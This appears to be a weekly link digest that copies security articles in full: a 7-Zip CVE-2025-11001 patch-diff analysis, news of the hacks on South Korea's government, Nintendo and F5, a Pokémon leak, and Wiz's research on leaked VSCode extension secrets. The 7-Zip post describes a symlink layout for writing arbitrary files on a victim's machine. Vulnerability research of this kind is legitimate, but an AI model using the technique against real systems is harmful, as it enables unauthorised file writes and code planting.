Quotidien Hebdomadaire Mensuel

Hebdomadaire Shaarli

Tous les liens d'un semaine sur une page.

Semaine 42 (October 13, 2025)

Diffing 7-Zip for CVE-2025-11001

pacbypass.github.io
Oct 16, 2025

Introduction
I spend some of my evenings browsing ZDI’s Advisory Page I saw two very interesting bugs (CVE-2025-11001, CVE-2025-11002) reported by Ryota Shiga from GMO Flatt Security Inc. The description shows that it is a path traversal in 7-Zip, yet the CVSS seems quite low for a potential initial access bug.

I’d like to mention there are 2 bugs disclosed by ZDI affecting this release with the same description and reporter, most likely the other report exploits a symlink bug with UNC paths, as this is also mentioned in the diff.

This post describes a vulnerability in 7-Zip’s module responsible for converting Linux symlinks to Windows ones (as well as other types of symlinks but this blog will focus on the Linux -> Windows side).

Initial assessment
When diffing between 7-Zip 24.09 vs 25.00 We can see that there are a few bugs fixed in this release. This patchs adds a considerable rework of the symlink support in zip extraction code in CPP/7zip/UI/Common/ArchiveExtractCallback.cpp. My eye instantly darted to the patch of IsSafePath.

-bool IsSafePath(const UString &path)
+static bool IsSafePath(const UString &path, bool isWSL)
{
CLinkLevelsInfo levelsInfo;

  • levelsInfo.Parse(path);
  • levelsInfo.Parse(path, isWSL);
    return !levelsInfo.IsAbsolute
    && levelsInfo.LowLevel >= 0
    && levelsInfo.FinalLevel > 0;
    }

+bool IsSafePath(const UString &path);
+bool IsSafePath(const UString &path)
+{

  • return IsSafePath(path, false); // isWSL
    +}

+void CLinkLevelsInfo::Parse(const UString &path, bool isWSL)
{

  • IsAbsolute = NName::IsAbsolutePath(path);
  • IsAbsolute = isWSL ?
  • IS_PATH_SEPAR(path[0]) :
  • NName::IsAbsolutePath(path);
    LowLevel = 0;
    FinalLevel = 0;
    }
    The bug looks like a case of processing Linux or WSL-style symlinks in zip. I initially thought of a year-old discussion between Bill Demarkapi and Yarden Shafir on LX symlinks https://x.com/BillDemirkapi/status/1750226136938725819 but this turned out to be the wrong idea.

Analysis
The main extraction point starts with CArchiveExtractCallback::GetStream() which calls ReadLink which makes this bug annoying to triage because ReadLink is not involved in parsing of actual symlinks but rather seems to try to get properties such as kpidHardLink which are supported in other types of archives.

GetStream calls CArchiveExtractCallback::GetExtractStream which identifies a symlink by first checking if it’s a small file (< 4k) and then performing a full file check.

if (_curSize_Defined && _curSize > 0 && _curSize < (1 << 12))
{
if (_fi.IsLinuxSymLink())
{
is_SymLink_in_Data = true;
_is_SymLink_in_Data_Linux = true;
}
else if (_fi.IsReparse())
{
is_SymLink_in_Data = true;
_is_SymLink_in_Data_Linux = false;
}
}
After a bunch of additional processing we hop into CArchiveExtractCallback::CloseReparseAndFile which is where the fun starts. The method attempts to parse the link and get an idea on where it is trying to point.

// Definition
bool CLinkInfo::Parse(const Byte *data, size_t dataSize, bool isLinuxData);

/ some code /

bool repraseMode = false;
bool needSetReparse = false;
CLinkInfo linkInfo;

if (_bufPtrSeqOutStream)
{
repraseMode = true;
reparseSize = _bufPtrSeqOutStream_Spec->GetPos();
if (_curSize_Defined && reparseSize == _outMemBuf.Size())
{
// _is_SymLink_in_Data_Linux == true
needSetReparse = linkInfo.Parse(_outMemBuf, reparseSize, _is_SymLink_in_Data_Linux);
if (!needSetReparse)
res = SendMessageError_with_LastError("Incorrect reparse stream", us2fs(_item.Path));
}
}
The parser sets 2 crucial attributes

Link path (destination path of the symlink)
isRelative (states if the symlink is relative)
The First issue
What happens when a Linux symlink has a Windows-style C:\ path?

The link path is set to the full C:\ path, yet it’s labeled relative because the parser follows the Linux-style check for absolute paths in the parser.

This will come in handy later.

#ifdef SUPPORT_LINKS
if (repraseMode)
{
_curSize = reparseSize;
_curSize_Defined = true;

#ifdef SUPPORT_LINKS
if (needSetReparse)
{
  if (!DeleteFileAlways(_diskFilePath))
  {
    RINOK(SendMessageError_with_LastError("can't delete file", _diskFilePath))
  }
  {
    bool linkWasSet = false;
    RINOK(SetFromLinkPath(_diskFilePath, linkInfo, linkWasSet))
    if (linkWasSet)
      _isSymLinkCreated = linkInfo.IsSymLink();
    else
      _needSetAttrib = false;
  }

}
#endif

}
#endif
SetFromLinkPath is the function which is responsible for creating a symlink with the specified path, however there was a guard rail in place stopping us from creating links to absolute paths.

if (linkInfo.isRelative)
relatPath = GetDirPrefixOf(_item.Path);
relatPath += linkInfo.linkPath;

if (!IsSafePath(relatPath))
{
return SendMessageError2(
0, // errorCode
"Dangerous link path was ignored",
us2fs(_item.Path),
us2fs(linkInfo.linkPath)); // us2fs(relatPath)
}
7-Zip crafts a relative destination path for the link to point to under the newly extracted zip file. Then it is verified with IsSafePath. In case of a relative link it adds the directory the symlink is in within the zip to the path being checked.

The second issue
In our case isRelative == true because the link was evaluated previously as relative, local path of the symlink inside of the directory gets prepended to the path, allowing us to bypass this check when the symlink is anywhere but the root directory of the zip file.

the check becomes isSafePath("some/directory/in/zip" + "C:\some\other\path") evaluating as true

The third issue
Later on there is a check which is supposed to check the actual link path for validity prior to creating a symlink, however previous to checking it, it checks if a given “item” (our symlink) is a directory, which it is not - effectively bypassing the check.

if (!_ntOptions.SymLinks_AllowDangerous.Val)
{

ifdef _WIN32

if (_item.IsDir) // NOPE
#endif
if (linkInfo.isRelative)
  {
    CLinkLevelsInfo levelsInfo;
    levelsInfo.Parse(linkInfo.linkPath);
    if (levelsInfo.FinalLevel < 1 || levelsInfo.IsAbsolute)
    {
      return SendMessageError2(
        0, // errorCode
        "Dangerous symbolic link path was ignored",
        us2fs(_item.Path),
        us2fs(linkInfo.linkPath));
    }
  }

}
After all of those checks, a symlink is created with

// existPath -> C:\some\other\path (symlink destination)
// data -> path for symlink to be created
// Initializes reparse data for symlink creation
if (!FillLinkData(data, fs2us(existPath), !linkInfo.isJunction, linkInfo.isWSL))
return SendMessageError("Cannot fill link data", us2fs(_item.Path));

/// ...

// creates symlink
if (!NFile::NIO::SetReparseData(fullProcessedPath, _item.IsDir, data, (DWORD)data.Size()))
{
RINOK(SendMessageError_with_LastError(kCantCreateSymLink, fullProcessedPath))
return S_OK;
}
Exploitation
Exploiting this bug is very simple, if we assume that the symlink gets extracted first we can craft a directory structure as below.

data/link -> symlink to C:\Users\YOURUSERNAME\Desktop (or any other location of your choice) data/link -> Directory data/link/calc.exe -> The file you want to write to the target directory

In this case the link is unpacked first, after which calc.exe gets unpacked into the symlink which 7-Zip follows and writes the binary to a directory of your choice

You can find an example exploit on my GitHub https://github.com/pacbypass/CVE-2025-11001

Basic takeaways
Fixed version is v25.00
Introduced in v21.02
This vulnerability can only be exploited from the context of an elevated user / service account or a machine with developer mode enabled.
This vulnerability can only be exploited on Windows
Thank you
Thank you for reading as well as a huge thank you to Ryota Shiga for discovering this vulnerability!

China Hacked South Korea’s Government, But Was It Really North Korea?

thediplomat.com
By Raphael Rashid
October 07, 2025

White hat hackers exposed a systematic breach of South Korea’s digital backbone, but Seoul remains silent on the crisis.

“It was by accident,” Saber told The Diplomat when asked how the white hat hacker and their partner cyb0rg discovered what appears to be one of the most comprehensive known penetrations of the South Korean government’s digital infrastructure in recent memory.

The two independent security researchers, only identified by their pseudonyms, claim to have compromised a workstation they attributed to Kimsuky, North Korea’s state-sponsored cyber espionage group. They published their findings in August through the hacker magazine Phrack at the annual DEF CON hacker conference in Las Vegas.

Their 8.9GB data dump triggered intense debate about who was really behind the systematic breach of South Korea’s most sensitive systems, and how it could ever have happened.

What the Hackers Found

The leaked data shows deep, sustained access to South Korea’s government backbone. At the center is the Onnara system, the government’s operational platform that handles document, inter-ministry communications, and knowledge management across central and local agencies.

Technical evidence shows the operator maintained active access to Onnara with custom automation tools and session management capabilities. The dump also revealed compromised email credentials for multiple accounts at the Defense Counterintelligence Command, with phishing attacks continuing until just days before publication.

The breach extended across multiple government institutions. The data includes complete source code from the Ministry of Foreign Affairs’ email platform, alongside evidence of targeting the Supreme Prosecutor’s Office and compromising the Ministry of Unification through brute-force attacks against the ministry’s domain. The dump also contains thousands of GPKI digital certificates – the cryptographic keys securing official communications – along with cracked passwords that protected them.

Telecommunications were also hit. The dump shows access to LG Uplus and credential collections indicating penetration of KT’s infrastructure. These firms are two of South Korea’s three major telecom operators.

Overall, the operator maintained extensive phishing campaigns, malware, and vast credential databases spanning multiple sectors.

The Attribution Puzzle

Based on technical analysis, there is broad consensus that the operations were conducted from China. Browser histories show the operator repeatedly used Google Translate to convert Korean text into simplified Chinese and followed work schedules matching Chinese holidays. Researchers from Korea University’s Graduate School of Information Security found Chinese-language documentation across the operator’s systems, notes written in Chinese characters, and browsing patterns focused on Chinese security websites. Spur, which specializes in proxy infrastructure analysis, traced much of the activity to WgetCloud, a Chinese proxy service predominantly used by China-based users.

Michael “Barni” Barnhart from DTEX, who has extensively tracked North Korean operations, told The Diplomat that “the infrastructure and malware used in these operations do not align with known APT43 tradecraft,” referring to the industry designation for North Korea’s Kimsuky. “The technical signatures, deployment methods, and operational patterns diverge significantly from previously observed APT43 campaigns,” he added. His assessment pointed to linguistic elements in malware communications suggesting “a lower-tier PRC-aligned actor.”

S2W, a South Korean cybersecurity firm, assessed that the actor was “unlikely to be directly associated with the North Korea-linked threat group Kimsuky,” citing inconsistent operational patterns and different toolsets from known Kimsuky operations.

But experts remain sharply divided on who was actually controlling these China-based operations. Some believe Chinese actors were working independently for Chinese intelligence interests. Others point to potential China-North Korea collaboration, given the documented precedent of North Korean operations from Chinese territory. Proponents of this view include Saber, who told The Diplomat that they believe the hacked hacker “is a Chinese national working from China and for both Chinese and North Korean government interests.”

A third theory suggests North Korea outsourced operations to Chinese contractors. The workstation involved was configured for the Korean time zone and its targets aligned with Kimsuky’s traditional focus on South Korean government institutions, potentially suggesting North Korean direction despite Chinese execution.

Barnhart noted that APT43 “is not assessed to be in a position of intelligence scarcity that would necessitate outsourcing to non-DPRK entities,” though such arrangements might “more plausibly align with Russian interests.”

The fourth possibility involves sophisticated Chinese false flag operations designed to implicate North Korea while pursuing separate intelligence objectives.

Seoul’s Fragmented Response

South Korea’s response has focused on damage control rather than accountability, likely reflecting both the scale and sensitivity of the hack, especially given the China connection.

Presidential spokesperson Kang Yu-jung claimed “no accurate information” when questioned about the breaches, deflecting to the Ministry of National Defense (MND). The MND has yet to comment publicly on the incident. When The Diplomat approached the Korea Internet & Security Agency, the agency deflected to the Ministry of Science and ICT (MSIT).

When approached directly, MSIT issued a brief statement: “MSIT is responsible for cyber threat response in the private information and communications sector, so we ask for your understanding that it is difficult to answer your questions.”

The Ministry of Unification acknowledged the incident, stating it had been “aware of security vulnerabilities in advance through cooperation with related agencies and completed measures.” The ministry confirmed implementing “security education for all staff” and strengthening “operational system security measures” following the breach.

Professor Kim Seung-joo from Korea University has been a vocal critic of the government, highlighting the absence of a cybersecurity “control tower.” At a recent parliamentary hearing into the KT and LG Uplus breaches – which mirrored a separate breach of SK Telecom, the country’s largest telecoms company – Kim said, “Our country’s government needs to think about how our intelligence capabilities are not even as good as two foreign hackers.”

When asked whether the breach constituted a national security crisis beyond mere data theft, he replied, “Yes, I see it that way.”

Seoul’s muted response could reflect diplomatic sensitivities around potential Chinese involvement. President Lee Jae-myung’s “pragmatic” diplomacy has sought improved relations with Beijing, with bilateral summit talks under consideration when President Xi Jinping visits for the upcoming APEC leaders’ meeting at the end of October. Direct attribution to China could complicate these efforts.

Beyond the diplomatic angle, confirmation of the link to China could potentially inflame anti-China sentiment and conspiracy theories, which have manifested in recent far-right rallies. The government is keen to diffuse these narratives.

A Systematic Campaign

The government’s lack of response becomes more concerning when viewed alongside evidence of widespread penetration across South Korea’s critical infrastructure.

According to data obtained by lawmakers, there were over 9,000 cyber intrusion attempts against military networks in the first half of 2025 alone, up 36 percent from 2023.

The Ministry of Health and Welfare and its agencies also faced over half a million hacking attempts by August 2025, up 151 percent from 2022. The ministry has seen a staggering 4,813 percent increase in targeting compared to 2022.

Yet despite planned increases in overall cybersecurity spending for 2026, critics argue that the government’s record 35.3 trillion won R&D budget plan lacks dedicated cybersecurity categories, with security funding either embedded within other sectors or missing entirely.

The fragility of critical government infrastructure was demonstrated in September when a battery fire at the National Information Resources Service in Daejeon shut down 647 government systems – nearly one-third of all national information systems. The National Intelligence Service raised the cyber threat level as a result, citing fears hackers could exploit potential security gaps during recovery work ahead of the APEC leaders meeting.

These vulnerabilities may represent only the visible portion of a far more serious compromise. Evidence in the Phrack data dump seen by The Diplomat suggests the penetration likely extended to highly sensitive materials related to North Korea and intelligence gathering operations. Given that the obtained data pertains to only one workstation, the discovery potentially reveals a much wider breach, raising further questions about attribution, potential false flag operations, and the purpose of gaining such information.

When specifically questioned about access to such materials, the Ministry of Unification provided vague responses, stating it was “currently investigating with related agencies” without elaborating which ones or the scope of the potential compromise.

As investigations continue, the question of attribution remains complex, but the scale of compromise across both public and private sectors is becoming clear, representing a strategic failure with implications for national security and public confidence in critical infrastructure.

“Hopefully researchers will take a closer look at the dumps and better understand how these APTs harass citizens,” Saber said. “The world would be a better place without them.”

Nintendo allegedly hacked by Crimson Collective hacking group — screenshot shows leaked folders, production assets, developer files, and backups

| Tom's Hardware
By Jowi Morales published October 11, 2025

The Crimson Collective hacking group claims to have breached Nintendo's security and stolen files from the gaming company.
A high-profile hacking group called Crimson Collective claimed that it had successfully hacked Nintendo, which is notorious for being litigious and overprotective of its intellectual property. Cybersecurity intelligence firm Hackmanac shared a screenshot on X that allegedly showed proof of the attack, with folders that seemingly stored Nintendo data, including production assets, developer files, and backups. However, the Japanese gaming giant is yet to make a statement about this attack, so we’re unsure if this is real or just a made-up screenshot.

Crimson Collective is the group behind the recent attack on Red Hat, during which it gained unauthorized access to the company’s GitHub repositories and stole about 570GB of data. The group then attempted to extort the company but was simply dismissed. Red Hat eventually confirmed the breach, opting to work with the authorities to pursue the attackers and collaborating with its affected clients to rectify the issue.

If this attack on Nintendo is legitimate and perpetrated by the same party, then it’s likely they are attempting the same tactic of contacting the gaming giant through official channels and asking for payment to delete the stolen data, or else they will leak it.

This isn’t the first time that hackers have attacked a gaming company. Rockstar was previously targeted by an attack in 2023, and some of the source code for Grand Theft Auto VI was leaked online. In the same year, Insomniac Games, the studio behind several Spider-Man titles, was hit by a ransomware attack, and files related to games and employees were made available for download on the internet. CD Projekt Red was also a victim in 2021, after the source codes for Cyberpunk 2077, The Witcher 3, and several other titles, along with several different files, were stolen and threatened to be released publicly if the company did not pay.

Despite all the noise, Nintendo is known for keeping its secrets. Unless customer or personal data has been targeted or leaked, where it’s required by law to notify the public of an attack, it’s unlikely that the company will disclose any details of this breach. So, without confirmation from the makers of the Switch 2, we can only guess if Crimson Collective’s exploit is true or not.

Massive Pokemon leak purportedly covers gen 10 games, scrapped Z-A ideas

Leakers claim Pokémon Wind and Waves will be procedurally generated games that expand endlessly, with a focus on survival elements and exploration.

Pokémon fans may want to tread carefully right now, and not just because Pokémon Legends: Z-A has leaked days ahead of release. It seems that Game Freak may have suffered a much bigger leak than a single game, based on material that is currently circulating on the internet. The content, which purportedly shares a timeline for the next handful of Pokémon games, reveals what could be coming next for the 10th generation of mainline Pokémon games. Is any of it credible, though? There are reasons to believe the leaks are legit, and reasons to be skeptical.

We know that Game Freak did in fact suffer a major breach of information back in 2024 for which Nintendo filed a subpoena earlier this year, in the hopes of catching whoever was behind the leak. The leak, which fans refer to as "teraleak," contained a shocking amount of information not just about immediate games like Pokémon Legends: Z-A, but also a trove of materials that were never meant for public consumption. These included concept art and development documentation for new and old Pokémon games alike. At the time, the leaker suggested that they did not share everything they acquired on Game Freak, like the source code for Pokémon Legends: Z-A. This would imply that more information could potentially leak in the future.

Fast-forward to now, and leak accounts on social media are once again disseminating a bewildering amount of Pokémon content that supposedly originates from the same source. Moreover, these are leak accounts that have a proven track record with Pokémon leaks in the past, like when Pokémon Legends: Z-A's Mega Evolutions were posted on the internet months ahead of schedule. Whether the material actually comes from the same leaker is unclear, especially if the people involved might be in the middle of, or about to be in, a legal battle with Nintendo. Nintendo did not immediately respond to a request for comment.

Another reason the leak seems credible is the volume and quality of the materials floating around. The leaks include dozens of pages of apparent proposal documents for Pokémon Sword and Shield, concept art, and beta footage of Pokémon Legends: Z-A. Some of this material is the sort of thing generative AI could ostensibly create, given that Pokémon games have a specific art style that could be emulated. But things like hand-drawn maps or unpolished gameplay footage seem significantly harder to pull off, given their imperfect nature.

The material is also granular in a way that does not look curated. It's easy to believe someone might be motivated to trick people into believing they've got the inside track on the next mainline Pokémon game. It's not quite as probable that someone would spend time putting together a collection of boring graphs and Excel sheets. Not impossible, but unlikely.

With all of this said, what are leakers actually saying about the next mainline Pokémon games? According to leaked documents, the concept for the next big Pokémon games are Pokémon Wind and Waves, and they're aimed for release in 2026. The set of games will reportedly feature procedurally generated islands that are loosely based on Indonesia and southeast Asia. Unlike most major Pokémon games, Wind and Waves will supposedly begin in a big city rather than a small town. The games are said to have more of a survival bent than previous titles, including the ability to explore jungle and underwater regions. Special focus will be placed on weather elements, which will also be the theme behind the upcoming legendaries. There will be a new type of creature called "seed" Pokémon, but specifics regarding their function are currently being debated. The leaks even claim to outline what fans can expect in terms of rivals and enemy organizations. Get this: The baddie this time is supposedly going to be involved with land development, which runs counter to the untamed environments that Wind and Waves will supposedly allow players to explore.

While some of these ideas border on fantasy — can Game Freak truly pull off a game that could generate new areas infinitely when Scarlet and Violet barely handled open-world environments? — some of the details make sense on paper. It sounds believable that the newest Pokémon games will see Game Freak exploring whatever was trendy years ago — in this case, survival games, open-world environments, and procedural generation. It's also worth noting that Sword and Shield were partially limited by the power of the original Switch. Any future games will not be cross-platform, which would ostensibly free up Game Freak to pursue more technically demanding gameplay concepts.

The other huge asterisk worth considering here is, even if all of what's floating around is true, game development scarcely goes as planned. Five years is a long time from now. Ideas could change down the line or be scrapped entirely. To wit: The beta footage of Pokémon Legends: Z-A shows purported gameplay mechanics that almost certainly aren't in the final game, like third-person shooting mechanics and parkour. Both of these mechanics sound like they pertain to entirely different games than the one Pokémon Legends: Z-A turned out to be, according to previews and its pre-release marketing.

Beyond the mainline games, leaks assert that they've got the entirety of The Pokémon Company's next five years mapped out. For example, the next few years will include a tantalizing game that will include multiple regions from previous games, which the player will be able to explore seamlessly.

The thing is, leaks don't always pan out. Earlier this year, the rumor going around was that the 10th generation of Pokémon games were supposed to be set in Greece. Now those same sources are saying something else entirely. What's different this time around is that there's way more circumstantial evidence that makes the claims sound plausible. And the details are weirdly specific, like footage of water wave simulations and unfinished terrain.

But until Game Freak announces it? Take anything you see regarding Pokémon with a grain of salt.

F5 says hackers stole undisclosed BIG-IP flaws, source code

bleepingcomputer.com
By Bill Toulas
October 15, 2025

U.S. cybersecurity company F5 disclosed that nation-state hackers breached its systems and stole undisclosed BIG-IP security vulnerabilities and source code.

The company states that it first became aware of the breach on August 9, 2025, with its investigations revealing that the attackers had gained long-term access to its system, including the company's BIG-IP product development environment and engineering knowledge management platform.

F5 is a Fortune 500 tech giant specializing in cybersecurity, cloud management, and application delivery networking (ADN) applications. The company has 23,000 customers in 170 countries, and 48 of the Fortune 50 entities use its products.

BIG-IP is the firm's flagship product used for application delivery and traffic management by many large enterprises worldwide.

No supply-chain risk
It’s unclear how long the hackers maintained access, but the company confirmed that they stole source code, vulnerability data, and some configuration and implementation details for a limited number of customers.

"Through this access, certain files were exfiltrated, some of which contained certain portions of the Company's BIG-IP source code and information about undisclosed vulnerabilities that it was working on in BIG-IP," the company states.

Despite this critical exposure of undisclosed flaws, F5 says there's no evidence that the attackers leveraged the information in actual attacks, such as exploiting the undisclosed flaw against systems. The company also states that it has not seen evidence that the private information has been disclosed.

F5 claims that the threat actors' access to the BIG-IP environment did not compromise its software supply chain or result in any suspicious code modifications.

This includes its platforms that contain customer data, such as its CRM, financial, support case management, or iHealth systems. Furthermore, other products and platforms managed by the company are not compromised, including NGINX, F5 Distributed Cloud Services, or Silverline systems' source code.

Response to the breach
After discovering the intrusion, F5 took remediation action by tightening access to its systems, and improving its overall threat monitoring, detection, and response capabilities:

Rotated credentials and strengthened access controls across our systems.
Deployed improved inventory and patch management automation, as well as additional tooling to better monitor, detect, and respond to threats.
Implemented enhancements to our network security architecture.
Hardened our product development environment, including strengthening security controls and monitoring of all software development platforms.
Additionally, the company also focuses on the security of its products through source code reviews and security assessements with support from NCC Group and IOActive.

NCC Group's assessment covered security reviews of critical software components in BIG-IP and portions of the development pipeline in an effort that involved 76 consultants.

IOActive's expertise was called in after the security breach and the engagement is still in progress. The results so far show no evidence of the threat actor introducing vulnerablities in critical F5 software source code or the software development build pipeline.

Customers should take action
F5 is still reviewing which customers had their configuration or implementation details stolen and will contact them with guidance.

To help customers secure their F5 environments against risks stemming from the breach, the company released updates for BIG-IP, F5OS, BIG-IP Next for Kubernetes, BIG-IQ, and APM clients.

Despite any evidence "of undisclosed critical or remote code execution vulnerabilities," the company urges customers to prioritize installing the new BIG-IP software updates.

F5 confirmed that today's updates address the potential impact stemming from the stolen undisclosed vulnerabilities.

Furthermore, F5 support makes available a threat hunting guide for customers to improve detection and monitoring in their environment.

New best practices for hardening F5 systems now include automated checks to the F5 iHealth Diagnostic Tool, which can now flag security risks, vulnerabilities, prioritize actions, and provide remediation guidance.

Another recommendation is to enable BIG-IP event streaming to SIEM and configure the systems to log to a remote syslog server and monitor for login attempts.

"Our global support team is available to assist. You can open a MyF5 support case or contact F5 support directly for help updating your BIG-IP software, implementing any of these steps, or to address any questions you may have" - F5

The company added that it has validated the safety of BIG-IP releases through multiple independent reviews by leading cybersecurity firms, including CrowdStrike and Mandiant.

On Monday, F5 announced that it rotated the cryptographic certcertificates and keys used for signing its digital products. The change affects installing BIG-IP and BIG-IQ TMOS software images while ISO image signature verification is enabled, and installing BIG-IP F5OS tenant images on host systems running F5OS.

Additional guidance for F5 customers comes from UK's National Cyber Security Centre (NCSC) and the U.S. Cybersecurity and Infrastructure Security Agency (CISA).

Both agencies recommmend identifying all F5 products (hardware, software, and virtualized) and making sure that no management interface is exposed on the public web. If an exposed interface is discovered, companies should make compromise assessment.

F5 notes that it delayed the public disclosure of the incident at the U.S. government's request, presumably to allow enough time to secure critical systems.

"On September 12, 2025, the U.S. Department of Justice determined that a delay in public disclosure was warranted pursuant to Item 1.05(c) of Form 8-K. F5 is now filing this report in a timely manner," explains F5.

F5 states that the incident has no material impact on its operations. All services remain available and are considered safe, based on the latest available evidence.

BleepingComputer has contacted F5 to request more details about the incident, and we will update this post when we receive a response.

Picus Blue Report 2025

Supply Chain Risk in VSCode Extension Marketplaces

| Wiz Blog
Rami McCarthy
October 15, 2025

Wiz Research uncovered 500+ leaked secrets in VSCode and Open VSX extensions, exposing 150K installs to risk. Learn what happened and how it was fixed.

Wiz Research identified a pattern of secret leakage by publishers of VSCode IDE Extensions. This occurred across both the VSCode and Open VSX marketplaces, the latter of which is used by AI-powered VSCode forks like Cursor and Windsurf. Critically, in over a hundred cases this included leakage of access tokens granting the ability to update the extension itself. By default, VS Code will auto-update extensions as new versions become available. A leaked VSCode Marketplace or OpenVSX PAT allows an attacker to directly distribute a malicious extension update across the entire install base. An attacker who discovered this issue would have been able to directly distribute malware to the cumulative 150,000 install base.

Each leaked secret is a result of publisher error. However, after reporting this issue via Microsoft's Security Response Center (MSRC), Wiz has been collaborating with Microsoft on platform level improvements to provide guardrails against future secrets leakage in the VSCode Marketplace. Together, we've also launched a notification campaign to alert impacted publishers and help them address these vulnerabilities.

Discovering a massive secrets leak
In February, attackers started attempting to introduce malware to the VSCode Marketplace. Our initial goal was to identify additional malicious extensions, investigate them, and report them to the Marketplace for removal. While we did end up identifying several interesting malicious extensions, we stumbled on something much more impactful: a scourge of secrets leaking in extension packages.

VSCode extensions are distributed as .vsix files, which can be unzipped and inspected. However, we found that publishers often failed to consider that everything in the package was publicly available, or failed to successfully sanitize their extensions of hardcoded secrets.

In total, we found over 550 validated secrets, distributed across more than 500 extensions from hundreds of distinct publishers. Across the 67 distinct types of secrets we found, there were a few notable categories:

AI provider secrets (OpenAI, Gemini, Anthropic, XAI, DeepSeek, HuggingFace, Perplexity)

High risk profession platform secrets (AWS, Github, Stripe, Auth0, GCP)

Database secrets (MongoDB, Postgres, Supabase)

From themes to threats
The most interesting and globally impactful secrets are the access tokens that grant the ability to update the extension. For the VSCode Marketplace, these are Azure DevOps Personal Access Tokens. The Open VSX Marketplace uses open-vsx.org Access Tokens.

Over one hundred valid leaked VSCode Marketplace PATs were identified within VSCode Marketplace extensions. Together, they represent an install base of over 85,000 extension installs.

Over thirty leaked OVSX Access Tokens were identified, within either VSCode Marketplace or OVSX extensions. Together, they represent an install base of over 100,000 extension installs.

Much of this massive vulnerable install base is actually contributed by themes. This is interesting, because themes are generally viewed as safer than other extensions, given they don’t carry any code. However, they still increase your attack surface, as there is no technical control preventing themes from bundling malware.

An additional interesting lens on these leaked tokens involves the public distribution of company internal or vendor specific extensions. If you investigate the marketplace, you’ll notice extensions that have a low install count, but are specifically designed to support a single company’s engineers or customers. Internal extensions should not be distributed publicly, but often are for convenience. In one case, we found a VSCode Marketplace PAT that would allow us to push targeted malware to the workforce of a $30 billion market cap Chinese megacorp. Vendor specific extensions are common, and allow for interesting targeting opportunities if compromised. For example, one at risk extension belonged to a Russian construction technology company.

Now how did that get there?
Whenever we discover a new dataset of leaked secrets, we attempt to identify patterns that might indicate the root cause(s) and potential mitigations. In this case, the largest contributor to secrets leakage was the bundling of hidden files, also known as dotfiles. The quantity of .env files was especially prominent, although hardcoded credentials in extension source code were also prevalent.

Over the course of the year, we saw an increase in secrets leaking via AI related configuration files, including config.json, mcp.json and .cursorrules. Other common sources included build configuration (e.g package.json) and documentation (e.g README.md).

Hardening and Remediation
Discovering this critical issue was one thing, getting it fixed is another. We’ve spent the past six months working with Microsoft to help resolve this issue centrally, ensuring we can patch this gap and disclose responsibly.

The response to this issue took multiple forms.

Notification: Wiz made targeted notifications of the highest risk disclosed secrets throughout this process. Microsoft has further made several rounds of notification to impacted extension publishers reported by Wiz and asked them to take action. Every leaked Visual Studio Marketplace PAT was revoked. For other secrets, Microsoft communicated with publishers regarding their exposure and provided appropriate guidance.

Prevention:

Microsoft integrated secrets scanning capabilities prior to publishing and now blocks extensions with verified secrets, notifying extension owners when secrets are detected. See their announcement: Upcoming Security Enhancement: Secret Detection for Extensions, and follow up Secret Prevention for Extensions: Now in Blocking Mode.

OpenVSX is adding a prefix (ovsxp_) to their tokens. Microsoft supports OpenVSX tokens within their secret scanning of the VSCode Marketplace.

Mitigation: Having prevented further introduction of secrets, Microsoft scanned all existing extensions, for embedded secrets, and will be working with extension owners to ensure they are remediated by publishing a new, sanitized version of the affected extension.

In June, Microsoft shared their progress and roadmap for VSCode Marketplace security in Security and Trust in Visual Studio Marketplace.

On the publisher side, VSCode extension publishers should scan for secrets prior to publishing.

Guidance for users and administrators
For VSCode users:

Limit the number of installed extensions. Each extension introduces extended threat surface, which should be measured against the benefit of their usage.

Review extension trust criteria. Consider installation prevalence, reviews, extension history, and publisher reputation, among other metadata, prior to adoption.

Consider auto-update tradeoffs. Auto-updating extensions ensures you consume security updates, but introduces the risk of a compromised extension pushing malware to your machine.

For corporate security teams:

Develop an IDE extension inventory, in order to respond to reports of malicious extensions.

Consider a centralized allowlist for VSCode extensions.

Consider sourcing extensions from the VSCode Marketplace, which has higher review rigor and controls currently, over the OpenVSX Marketplace.

Guidance for Platforms on Hardening Secrets
Throughout this process, we observed the diversity in secrets formatting practice, and the downstream impact that can have on security. We want to take this opportunity to highlight the following security practices that platforms can implement in their secrets:

Expiration: defaulting to a reasonable secret lifetime decreases the exploitation window for leaked secrets. In this research, for example, we observed a significant volume of VSCode PATs leaked in 2023 that had expired automatically. In several cases, Open VSX PATs were leaked in the same location, and still valid. This demonstrates the benefit of expiration.

Identifiable structure: GitHub and Microsoft have long been advocates of structuring secrets for easier identification and protection. Identifiable prefixes, checksums, or the full Common Annotated Security Key (CASK) standard all offer an advantage to defenders. Our results will over-represent well-structured secrets, but remaining risks post-disclosure will predominantly be secrets that lack easily detectable structure.

GitHub Advanced Secret Scanning: Platforms should strongly consider enrolling in the Secret Scanning Partner Program. As shown in our past research, GitHub can be home to a large volume of secrets. In this project, we saw that a number of secrets leaked in VSCode extensions were also leaked on GitHub. For secrets supported by Advanced Secret Scanning, that meant publishers had already been notified of the risk automatically.

Takeaways & Timeline
We are relieved to have found, responsibly disclosed, and helped comprehensively resolve this risk.

The issue highlights the continued risks of extensions and plugins, and supply chain security in general. It continues to validate the impression that any package repository carries a high risk of mass secrets leakage. It also reflects our findings that AI secrets are a large part of the modern secrets leakage landscape, and indicates the role vibe coding might play in that problem.

Finally, our work with Microsoft highlights the role that responsible platforms can play in protecting the ecosystem. We are grateful to Microsoft for the partnership and working to protect customers together. Without their willingness to lean in here, it would have been impossible to scale disclosure and remediation.

For more documentation on VSCode Extension security, please visit:

Extension runtime security

Publishing Extensions

Walkthrough: Publish a Visual Studio extension

Timeline
March 30th, 2025: Wiz Research reports this issue to MSRC.

April 4th, 2025: Wiz reports initial batch of 250 leaked secrets.

April 25th, 2025: MSRC completes notification of impacted third-parties who had leaked reported secrets.

May 1st, 2025: MSRC marks the report Ineligible for Bounty, and closes the case as Complete.

May 2nd, 2025: Wiz notes potential negative impact of disclosure without additional controls in place, and requests information on platform level improvements.

May 13th, 2025: MSRC re-opens the case, and starts “working on a plan and a timeline for preventative measures”.

July 10th, 2025: MSRC shares plans for remediation, and requests a late-September disclosure timeline.

June 11th, 2025: Microsoft publishes Security and Trust in Visual Studio Marketplace

Aug 12th, 2025: MSRC and Wiz Research meet, and expand on remediation plans. Wiz identifies and highlights VSCode Marketplace PAT detection gap in secrets scanning. VSCode Marketplace team announces Secret Detection for Extensions.

Aug 27th, 2025: MSRC sets September 25th as the disclosure date.

Sep 18th, 2025: MSRC requests a delay in disclosure due to a performance issue in an implemented hardening measure.

